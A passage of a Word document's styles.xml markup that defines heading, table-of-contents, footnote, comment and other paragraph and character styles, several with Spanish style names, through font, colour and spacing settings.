    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="243F60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Calibri"/>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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num1z2">
    <w:name w:val="WW8Num1z2"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num1z3">
    <w:name w:val="WW8Num1z3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num3z0">
    <w:name w:val="WW8Num3z0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num4z0">
    <w:name w:val="WW8Num4z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num4z1">
    <w:name w:val="WW8Num4z1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num4z2">
    <w:name w:val="WW8Num4z2"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num4z3">
    <w:name w:val="WW8Num4z3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Fuentedeprrafopredeter1">
    <w:name w:val="Fuente de párrafo predeter.1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextodegloboCar">
    <w:name w:val="Texto de globo Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EncabezadoCar">
    <w:name w:val="Encabezado Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter1"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PiedepginaCar">
    <w:name w:val="Pie de página Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter1"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Car">
    <w:name w:val="Título 1 Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Gothic" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="345A8A"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo2Car">
    <w:name w:val="Título 2 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo3Car">
    <w:name w:val="Título 3 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo4Car">
    <w:name w:val="Título 4 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo5Car">
    <w:name w:val="Título 5 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="243F60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo6Car">
    <w:name w:val="Título 6 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo7Car">
    <w:name w:val="Título 7 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo8Car">
    <w:name w:val="Título 8 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo9Car">
    <w:name w:val="Título 9 Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Gothic" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TtuloCar">
    <w:name w:val="Título Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="MS Gothic"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="365F91"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitaCar">
    <w:name w:val="Cita Car"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink1">
    <w:name w:val="Hyperlink1"/>
    <w:rsid w:val="004F1B3E"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006E2539"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="006E2539"/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="006E2539"/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:b/>
      <w:bCs/>
      <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00486204"/>
    <w:rPr>
      <w:color w:val="954F72"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Caracteresdenotaalpie">
    <w:name w:val="Caracteres de nota al pie"/>
    <w:qFormat/>
    <w:rsid w:val="004F1B3E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteReference1">
    <w:name w:val="Footnote Reference1"/>
    <w:rsid w:val="004F1B3E"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:link w:val="FootnoteText"/>
    <w:qFormat/>
    <w:rsid w:val="004F1B3E"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mjx-char">
    <w:name w:val="mjx-char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00D3256A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Enlacedelndice">
    <w:name w:val="Enlace del índice"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Caracteresdenotafinal">
    <w:name w:val="Caracteres de nota final"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ttulo">
    <w:name w:val="Título"/>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after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ndice">
    <w:name w:val="Índice"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ttulo1">
    <w:name w:val="Título1"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>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styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cabeceraypie">
    <w:name w:val="Cabecera y pie"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4819"/>
        <w:tab w:val="right" w:pos="9638"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Descripcin1">
    <w:name w:val="Descripción1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Tabladeilustraciones1">
    <w:name w:val="Tabla de ilustraciones1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="851" w:right="567" w:hanging="851"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0007676D"/>
    <w:pPr>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Anexos">
    <w:name w:val="Anexos"/>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96"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="IntroduccionConclusion">
    <w:name w:val="IntroduccionConclusion"/>
    <w:basedOn w:val="Heading1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="1" w:color="365F91"/>
      </w:pBdr>
      <w:spacing w:before="600" w:after="80"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:color w:val="365F91"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubIntroduccionConclusion">
    <w:name w:val="SubIntroduccionConclusion"/>
    <w:basedOn w:val="Heading2"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="1" w:color="365F91"/>
      </w:pBdr>
      <w:spacing w:after="80"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="365F91"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contenidodelatabla">
    <w:name w:val="Contenido de la tabla"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressLineNumbers/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ttulodelatabla">
    <w:name w:val="Título de la tabla"/>
    <w:basedOn w:val="Contenidodelatabla"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contenidodelmarco">
    <w:name w:val="Contenido del marco"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Ttulo"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00835C31"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="32"/>
      <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00677D7E"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006E2539"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006E2539"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="0023668D"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="NSimSun" w:hAnsi="Liberation Serif" w:cs="Arial"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:rsid w:val="004F1B3E"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressLineNumbers/>
      <w:ind w:left="339" w:hanging="339"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B83F70"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B83F70"/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B83F70"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B83F70"/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B83F70"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
